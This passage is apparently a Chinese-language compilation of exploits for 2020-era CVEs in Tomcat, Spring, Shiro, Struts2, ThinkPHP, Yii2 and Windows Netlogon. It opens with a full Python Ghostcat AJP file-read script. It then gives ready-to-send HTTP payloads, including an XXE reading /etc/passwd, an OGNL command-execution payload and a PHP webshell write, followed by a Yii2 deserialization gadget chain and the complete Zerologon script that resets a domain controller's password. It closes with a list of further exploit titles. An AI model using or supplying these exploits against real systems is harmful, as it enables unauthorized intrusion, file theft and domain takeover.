		data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH)
		if len(data) == 0:
			return struct.pack(">bbH", 0x12, 0x34, 0x00)
		else:
			res = struct.pack(">H", len(data))
			res += data
		if self.data_direction == AjpBodyRequest.SERVER_TO_CONTAINER:
			header = struct.pack(">bbH", 0x12, 0x34, len(res))
		else:
			header = struct.pack(">bbH", 0x41, 0x42, len(res))
		return header + res
	def send_and_receive(self, socket, stream):
		while True:
			data = self.serialize()
			socket.send(data)
			r = AjpResponse.receive(stream)
			while r.prefix_code != AjpResponse.GET_BODY_CHUNK and r.prefix_code != AjpResponse.SEND_HEADERS:
				r = AjpResponse.receive(stream)

			if r.prefix_code == AjpResponse.SEND_HEADERS or len(data) == 4:
				break
class AjpForwardRequest(object):
	_, OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, ACL, REPORT, VERSION_CONTROL, CHECKIN, CHECKOUT, UNCHECKOUT, SEARCH, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE_CONTROL, MKACTIVITY = range(28)
	REQUEST_METHODS = {'GET': GET, 'POST': POST, 'HEAD': HEAD, 'OPTIONS': OPTIONS, 'PUT': PUT, 'DELETE': DELETE, 'TRACE': TRACE}
	# server == web server, container == servlet
	SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2)
	COMMON_HEADERS = ["SC_REQ_ACCEPT",
		"SC_REQ_ACCEPT_CHARSET", "SC_REQ_ACCEPT_ENCODING", "SC_REQ_ACCEPT_LANGUAGE", "SC_REQ_AUTHORIZATION",
		"SC_REQ_CONNECTION", "SC_REQ_CONTENT_TYPE", "SC_REQ_CONTENT_LENGTH", "SC_REQ_COOKIE", "SC_REQ_COOKIE2",
		"SC_REQ_HOST", "SC_REQ_PRAGMA", "SC_REQ_REFERER", "SC_REQ_USER_AGENT"
	]
	ATTRIBUTES = ["context", "servlet_path", "remote_user", "auth_type", "query_string", "route", "ssl_cert", "ssl_cipher", "ssl_session", "req_attribute", "ssl_key_size", "secret", "stored_method"]
	def __init__(self, data_direction=None):
		self.prefix_code = 0x02
		self.method = None
		self.protocol = None
		self.req_uri = None
		self.remote_addr = None
		self.remote_host = None
		self.server_name = None
		self.server_port = None
		self.is_ssl = None
		self.num_headers = None
		self.request_headers = None
		self.attributes = None
		self.data_direction = data_direction
	def pack_headers(self):
		self.num_headers = len(self.request_headers)
		res = ""
		res = struct.pack(">h", self.num_headers)
		for h_name in self.request_headers:
			if h_name.startswith("SC_REQ"):
				code = AjpForwardRequest.COMMON_HEADERS.index(h_name) + 1
				res += struct.pack("BB", 0xA0, code)
			else:
				res += pack_string(h_name)

			res += pack_string(self.request_headers[h_name])
		return res

	def pack_attributes(self):
		res = b""
		for attr in self.attributes:
			a_name = attr['name']
			code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
			res += struct.pack("b", code)
			if a_name == "req_attribute":
				aa_name, a_value = attr['value']
				res += pack_string(aa_name)
				res += pack_string(a_value)
			else:
				res += pack_string(attr['value'])
		res += struct.pack("B", 0xFF)
		return res
	def serialize(self):
		res = ""
		res = struct.pack("bb", self.prefix_code, self.method)
		res += pack_string(self.protocol)
		res += pack_string(self.req_uri)
		res += pack_string(self.remote_addr)
		res += pack_string(self.remote_host)
		res += pack_string(self.server_name)
		res += struct.pack(">h", self.server_port)
		res += struct.pack("?", self.is_ssl)
		res += self.pack_headers()
		res += self.pack_attributes()
		if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
			header = struct.pack(">bbh", 0x12, 0x34, len(res))
		else:
			header = struct.pack(">bbh", 0x41, 0x42, len(res))
		return header + res
	def parse(self, raw_packet):
		stream = StringIO(raw_packet)
		self.magic1, self.magic2, data_len = unpack(stream, "bbH")
		self.prefix_code, self.method = unpack(stream, "bb")
		self.protocol = unpack_string(stream)
		self.req_uri = unpack_string(stream)
		self.remote_addr = unpack_string(stream)
		self.remote_host = unpack_string(stream)
		self.server_name = unpack_string(stream)
		self.server_port = unpack(stream, ">h")
		self.is_ssl = unpack(stream, "?")
		self.num_headers, = unpack(stream, ">H")
		self.request_headers = {}
		for i in range(self.num_headers):
			code, = unpack(stream, ">H")
			if code > 0xA000:
				h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
			else:
				h_name = unpack(stream, "%ds" % code)
				stream.read(1) # \0
			h_value = unpack_string(stream)
			self.request_headers[h_name] = h_value
	def send_and_receive(self, socket, stream, save_cookies=False):
		res = []
		i = socket.sendall(self.serialize())
		if self.method == AjpForwardRequest.POST:
			return res

		r = AjpResponse.receive(stream)
		assert r.prefix_code == AjpResponse.SEND_HEADERS
		res.append(r)
		if save_cookies and 'Set-Cookie' in r.response_headers:
			self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']

		# read body chunks and end response packets
		while True:
			r = AjpResponse.receive(stream)
			res.append(r)
			if r.prefix_code == AjpResponse.END_RESPONSE:
				break
			elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
				continue
			else:
				raise NotImplementedError
				break

		return res

class AjpResponse(object):
	_,_,_,SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE, GET_BODY_CHUNK = range(7)
	COMMON_SEND_HEADERS = [
			"Content-Type", "Content-Language", "Content-Length", "Date", "Last-Modified",
			"Location", "Set-Cookie", "Set-Cookie2", "Servlet-Engine", "Status", "WWW-Authenticate"
			]
	def parse(self, stream):
		# read headers
		self.magic, self.data_length, self.prefix_code = unpack(stream, ">HHb")

		if self.prefix_code == AjpResponse.SEND_HEADERS:
			self.parse_send_headers(stream)
		elif self.prefix_code == AjpResponse.SEND_BODY_CHUNK:
			self.parse_send_body_chunk(stream)
		elif self.prefix_code == AjpResponse.END_RESPONSE:
			self.parse_end_response(stream)
		elif self.prefix_code == AjpResponse.GET_BODY_CHUNK:
			self.parse_get_body_chunk(stream)
		else:
			raise NotImplementedError

	def parse_send_headers(self, stream):
		self.http_status_code, = unpack(stream, ">H")
		self.http_status_msg = unpack_string(stream)
		self.num_headers, = unpack(stream, ">H")
		self.response_headers = {}
		for i in range(self.num_headers):
			code, = unpack(stream, ">H")
			if code <= 0xA000: # custom header
				h_name, = unpack(stream, "%ds" % code)
				stream.read(1) # \0
				h_value = unpack_string(stream)
			else:
				h_name = AjpResponse.COMMON_SEND_HEADERS[code-0xA001]
				h_value = unpack_string(stream)
			self.response_headers[h_name] = h_value

	def parse_send_body_chunk(self, stream):
		self.data_length, = unpack(stream, ">H")
		self.data = stream.read(self.data_length+1)

	def parse_end_response(self, stream):
		self.reuse, = unpack(stream, "b")

	def parse_get_body_chunk(self, stream):
		rlen, = unpack(stream, ">H")
		return rlen

	@staticmethod
	def receive(stream):
		r = AjpResponse()
		r.parse(stream)
		return r

import socket

def prepare_ajp_forward_request(target_host, req_uri, method=AjpForwardRequest.GET):
	fr = AjpForwardRequest(AjpForwardRequest.SERVER_TO_CONTAINER)
	fr.method = method
	fr.protocol = "HTTP/1.1"
	fr.req_uri = req_uri
	fr.remote_addr = target_host
	fr.remote_host = None
	fr.server_name = target_host
	fr.server_port = 80
	fr.request_headers = {
		'SC_REQ_ACCEPT': 'text/html',
		'SC_REQ_CONNECTION': 'keep-alive',
		'SC_REQ_CONTENT_LENGTH': '0',
		'SC_REQ_HOST': target_host,
		'SC_REQ_USER_AGENT': 'Mozilla',
		'Accept-Encoding': 'gzip, deflate, sdch',
		'Accept-Language': 'en-US,en;q=0.5',
		'Upgrade-Insecure-Requests': '1',
		'Cache-Control': 'max-age=0'
	}
	fr.is_ssl = False
	fr.attributes = []
	return fr

class Tomcat(object):
	def __init__(self, target_host, target_port):
		self.target_host = target_host
		self.target_port = target_port

		self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
		self.socket.connect((target_host, target_port))
		self.stream = self.socket.makefile("rb", bufsize=0)

	def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
		self.req_uri = req_uri
		self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
		print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
		if user is not None and password is not None:
			self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
		for h in headers:
			self.forward_request.request_headers[h] = headers[h]
		for a in attributes:
			self.forward_request.attributes.append(a)
		responses = self.forward_request.send_and_receive(self.socket, self.stream)
		if len(responses) == 0:
			return None, None
		snd_hdrs_res = responses[0]
		data_res = responses[1:-1]
		if len(data_res) == 0:
			print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
		return snd_hdrs_res, data_res

'''
javax.servlet.include.request_uri
javax.servlet.include.path_info
javax.servlet.include.servlet_path
'''

import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_,data = t.perform_request('/asdf',attributes=[
    {'name':'req_attribute','value':['javax.servlet.include.request_uri','/']},
    {'name':'req_attribute','value':['javax.servlet.include.path_info',args.file]},
    {'name':'req_attribute','value':['javax.servlet.include.servlet_path','/']},
    ])
print('----------------------------')
print("".join([d.data for d in data]))

8、Apache Tomcat session持久化远程代码执行漏洞 CVE-2020-9484

参考：https://blog.csdn.net/xuandao_ahfengren/article/details/106937171 https://xz.aliyun.com/t/7803#toc-1

9、Nginx使用LemonLDAP::NG权限绕过 CVE-2020-24660

四、框架

JAVA：

1、Spring MVC框架RFD攻击漏洞（反射文件下载）CVE-2020-5398

GET /?filename=sample.sh%22%3B&contents=%23!%2Fbin%2Fbash%0Awhoami%27%20--dump-header%20- HTTP/1.1
Host: 192.168.248.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

参考：https://www.cnblogs.com/Sylon/p/12700849.html

2、Spring Framework反射型文件下载漏洞 CVE-2020-5421

参考：https://xz.aliyun.com/t/8341?page=5

https://mp.weixin.qq.com/s?__biz=MzUyMzczNzUyNQ==&mid=2247495382&idx=3&sn=21e43c186df31d9df263d211b4af208a&chksm=fa3aae0ccd4d271a3e848e6ad5820a3867c1a2e1f7376af12aadb0b946d5814c548f7f1e01ac&scene=0&xtrack=1#rd

3、Spring-Cloud-Config-Server目录遍历 CVE-2020-5410

http://ip:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29

参考：https://xz.aliyun.com/t/7877

4、Spring Cloud Netflix Hystrix Dashboard SSRF

/proxy.stream?origin=http://www.baidu.com

5、Apache Cocoon XML注入 cve-2020-11991

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
<firstName>John</firstName> 
<lastName>&ent;</lastName>
</userInfo>

参考：https://www.cnblogs.com/Yang34/p/13665674.html

6、Apache Shiro 权限绕过漏洞 CVE-2020-13933

7、Apache Shiro身份验证绕过漏洞 CVE-2020-11989

http://localhost:8080/;/admin/index
 http://localhost:8080/admin/index/

参考：https://xz.aliyun.com/t/7964

8、Apache Dubbo远程代码执行漏洞 CVE-2020-11995

9、Apache Dubbo反序列化漏洞 CVE-2020-1948

10、Apache Dubbo反序列化漏洞 CVE-2019-1756

11、Struts2远程代码执行漏洞 CVE-2019-0230

poc1:
http://ip:port/test-S2-059.action?payload=%25%7b%31%2b%34%7d%0a

poc2:
POST /s2_059/index.action HTTP/1.1
Host: localhost:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 606
Origin: http://localhost:8085
Connection: close
Referer: http://localhost:8085/s2_059_war/
Cookie: JSESSIONID=272825C954147516F847095B055202B5; JSESSIONID=01F82222F5CCED3DC9B7819AE6C98DA0
Upgrade-Insecure-Requests: 1

payload=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d

参考：https://paper.seebug.org/1331/

12、Jackson 多个反序列化安全漏洞 CVE-2020-24616

13、Fastjson <= 1.2.68 远程命令执行漏洞

PHP

1、ThinkPHP 3.x注入漏洞

2、ThinkPHP 6 任意文件操作漏洞

备注：2020年1月老漏洞

POST /tp6/public/index.php/index/test1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/tp6/public/index.php/index/test1
Cookie: PHPSESSID=1234567890123456789012345678.php;
Upgrade-Insecure-Requests: 1

key=<?php%20phpinfo();?>

3、Yii 2框架反序列化远程命令执漏洞 CVE-2020-15148

exp

<?php
namespace yii\rest {
    class Action extends \yii\base\Action
    {
        public $checkAccess;
    }
    class IndexAction extends Action
    {
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\base {
    class BaseObject
    {
        //
    }
    class Action
    {
        public $id;
    }
}
namespace yii\db {
    use yii\base\BaseObject;
    class BatchQueryResult extends BaseObject
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
$exp = new \yii\db\BatchQueryResult($func, $param);
print(serialize($exp));

参考：https://mp.weixin.qq.com/s/3a3whSUhxMZz2g3btxdytw https://xz.aliyun.com/t/8307

4、Fastadmin文件上传漏洞，危害级别：高危

通过前文可知，这个漏洞的利用点在_empty()函数，需要注意的是，在官方文档中通常_empty()方法是用来判断一个方法是否存在，如果不存在，则进入该函数。而这里是开发者自定义的方法，因此直接传入_empty方法，调用name参数即可。

利用过程如下：

在前台的会员中心，个人资料处，上传修改头像：

5.png

抓包后修改图片数据（满足图片头格式即可）：

6.png

记录下路径后，成功getshell

7.png

在Linux下，通过这种方法会失效，因为在/public路径下不存在user目录，由前文中的知识点可以知道，当不存在这个目录的时候，无论怎么跳转目录，is_file()函数返回的结果始终未false，因此无法利用该漏洞，如下图所示：

8.png

当我们在/public目录下创建文件夹/user，在利用，即可成功：

9.png

参考：https://www.cnpanda.net/codeaudit/777.html

5、thinkadmin 目录遍历/任意文件读取 CVE-2020-25540

参考：https://github.com/zoujingli/ThinkAdmin/issues/244

五、操作系统

1、Windows NetLogon特权提升漏洞 CVE-2020-1472

利用条件：

未经身份认证的攻击者可通过使用 Netlogon 远程协议（MS-NRPC）连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权。

可以下载利用脚本1-置空密码和利用脚本2-恢复密码来Getshell

#!/usr/bin/env python3
#
# CVE-2020-1472 - Zerologon
#
# Paper:    https://www.secura.com/pathtoimg.php?id=2055
# PoC by:   Pablo Martínez (@xassiz) && Antón Ortigueira (@antuache) from BlackArrow
# Web:      [www.blackarrow.net] - [www.tarlogic.com]
#

from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRUNION, NDRPOINTER, NDRUniConformantArray, \
	NDRUniFixedArray, NDRUniConformantVaryingArray
from impacket.dcerpc.v5.dtypes import WSTR, LPWSTR, DWORD, ULONG, USHORT, PGUID, NTSTATUS, NULL, LONG, UCHAR, PRPC_SID, \
	GUID, RPC_UNICODE_STRING, SECURITY_INFORMATION, LPULONG

from impacket.dcerpc.v5.nrpc import *
from impacket.dcerpc.v5 import nrpc, epm
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport
from impacket import crypto

import hmac, hashlib, struct, sys, socket, time
from binascii import hexlify, unhexlify
from subprocess import check_call
from struct import pack, unpack

# Give up brute-forcing after this many attempts. If vulnerable, 256 attempts are expected to be neccessary on average.
MAX_ATTEMPTS = 2000 # False negative chance: 0.04%

def fail(msg):
	print(msg, file=sys.stderr)
	print('This might have been caused by invalid arguments or network issues.', file=sys.stderr)
	sys.exit(2)

def try_zero_authenticate(dc_handle, dc_ip, target_computer):
	# Connect to the DC's Netlogon service.
	binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
	rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
	rpc_con.connect()
	rpc_con.bind(nrpc.MSRPC_UUID_NRPC)

	# Use an all-zero challenge and credential.
	plaintext = b'\x00' * 8
	ciphertext = b'\x00' * 8

	# Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
	flags = 0x212fffff

	# Send challenge and authentication request.
	nrpc.hNetrServerReqChallenge(rpc_con, dc_handle + '\x00', target_computer + '\x00', plaintext)
	try:
		server_auth = nrpc.hNetrServerAuthenticate3(rpc_con, dc_handle + '\x00', target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,target_computer + '\x00', ciphertext, flags)

		# It worked!
		assert server_auth['ErrorCode'] == 0
		return rpc_con

	except nrpc.DCERPCSessionError as ex:
	# Failure should be due to a STATUS_ACCESS_DENIED error. Otherwise, the attack is probably not working.
		if ex.get_error_code() == 0xc0000022:
			return None
		else:
			fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
	except BaseException as ex:
		fail(f'Unexpected error: {ex}.')


def perform_attack(dc_handle, dc_ip, target_computer):
	# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
	print("[!] CVE-2020-1472 PoC by BlackArrow (Tarlogic)\n")
	print('Performing authentication attempts...')
	rpc_con = None
	for attempt in range(0, MAX_ATTEMPTS):
		rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)

		if rpc_con == None:
			print('=', end='', flush=True)
		else:
			break

	if rpc_con:
		print('\nSuccess! DC can be fully compromised by a Zerologon attack. (attempt={})'.format(attempt))
	else:
		print('\nAttack failed. Target is probably patched.')
		sys.exit(1)

	return rpc_con


def get_authenticator(cred=b'\x00' * 8):
	authenticator = nrpc.NETLOGON_AUTHENTICATOR()
	authenticator['Credential'] = cred
	authenticator['Timestamp'] = 0
	return authenticator


class NetrServerPasswordSet2(NDRCALL):
	opnum = 30
	structure = (
		('PrimaryName', PLOGONSRV_HANDLE),
		('AccountName', WSTR),
		('SecureChannelType', NETLOGON_SECURE_CHANNEL_TYPE),
		('ComputerName', WSTR),
		('Authenticator', NETLOGON_AUTHENTICATOR),
		('ClearNewPassword', NL_TRUST_PASSWORD),
	)
	
class NetrServerPasswordSet2Response(NDRCALL):
	structure = (
		('ReturnAuthenticator', NETLOGON_AUTHENTICATOR),
		('ErrorCode', NTSTATUS),
	)


def passwordSet2(rpc_con, dc_name, target_account):
	dce = rpc_con

	if dce is None:
		return

	request = NetrServerPasswordSet2()
	request['PrimaryName'] = dc_name + '\x00'
	request['AccountName'] = target_account + '\x00'
	request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
	request['ComputerName'] = dc_name + '\x00'
	request['Authenticator'] = get_authenticator()
	
	clear = NL_TRUST_PASSWORD()
	clear['Buffer'] = b'\x00' * 516
	clear['Length'] = '\x00' * 4
	request['ClearNewPassword'] = clear

	try:
		print()
		resp = dce.request(request)
		resp.dump()
		print("[+] CVE-2020-1472 exploited\n")
	except Exception as e:
		raise
	dce.disconnect()


if not (3 <= len(sys.argv) <= 4):
	print('Usage: CVE-2020-1472.py <nbios-name> <computer> <dc-ip>\n')
	print('Performs the Zerologon attack and resets the computer password of the domain controller.')
	print('Note: nbios-name should be the (NetBIOS) computer name of the domain controller.')
	sys.exit(1)
else:
	[_, nbios_name, computer, dc_ip] = sys.argv

	nbios_name = nbios_name.rstrip('$')
	rpc_con = perform_attack('\\\\' + nbios_name, dc_ip, nbios_name)

	passwordSet2(rpc_con, nbios_name, computer)

	rpc_con.disconnect()

参考链接：https://mp.weixin.qq.com/s/MagXtN1hfNPTQdcIMDOZEA

https://github.com/blackarrowsec/redteam-research

https://www.cnblogs.com/forforever/p/13682344.html

https://mp.weixin.qq.com/s/f1f1nGSMdEXJL3lY7FCMMw

https://www.cnblogs.com/forforever/p/13682344.html

2、永恒之蓝 MS17-17010

内网刷分的利器

六、数据库

1、redis

Redis未授权访问漏洞利用总结
Redis 4.x RCE
redis利用姿势收集
Redis历史漏洞合集

2、hadoop

Hadoop Yarn REST API未授权漏洞利用

3、mysql

Mysql提权(CVE-2016-6663、CVE-2016-6664组合实践)
Mysql数据库渗透及漏洞利用总结
Mysql 注入专辑
PhpMyadmin的几种getshell方法
高版本MySQL之UDF提权
Mysql历史漏洞合集

4、Mssql

Mssql利用姿势整理(史上最全)
Mssql数据库命令执行总
利用mssql模拟登录提权
高级的MSSQL注入技巧
MSSQL使用CLR程序集来执行命令

5、Nosql

NoSql 数据库之漏洞利用方法总结

七、邮件

参考：https://mp.weixin.qq.com/s/wiZJUQ6Un9UuE98YFBYWig

1、Exchange

CVE-2020-17083 Microsoft Exchange Server 远程执行代码漏洞

Microsoft Exchange远程代码执行漏洞（CVE-2020-16875）

CVE-2020-0688_微软EXCHANGE服务的远程代码执行漏洞

Microsoft Exchange任意用户伪造漏洞

Exchange 历史漏洞合集

2、coremail

coremail 配置信息泄露及接口未授权漏洞

Coremail的存储型XSS漏洞

Coremail 历史漏洞合集

八、项目管理

1、禅道

CNVD-C-2020-121325 禅道开源版文件上传漏洞

禅道9.1.2 免登陆SQL注入漏洞

禅道 ≤ 12.4.2 后台管理员权限Getshell

禅道9.1.2 权限控制逻辑漏洞

禅道826版本一定条件getshell

禅道远程代码执行漏洞

禅道11.6任意文件读取

2、Jira

Atlassian Jira漏洞大杂烩

Jira服务工作台路径遍历导致的敏感信息泄露漏洞（CVE-2019-14994）

Jira未授权SSRF漏洞(CVE-2019-8451)

Atlassian JIRA服务器模板注入漏洞（CVE-2019-11581）

CVE-2019-8449 JIRA 信息泄漏漏洞

Jira历史漏洞合集

更新说明：

[2021.1.21更新数据库、邮件、项目管理部分] 参考：https://mp.weixin.qq.com/s/wiZJUQ6Un9UuE98YFBYWig

[2020.10.27更新操作系统部分]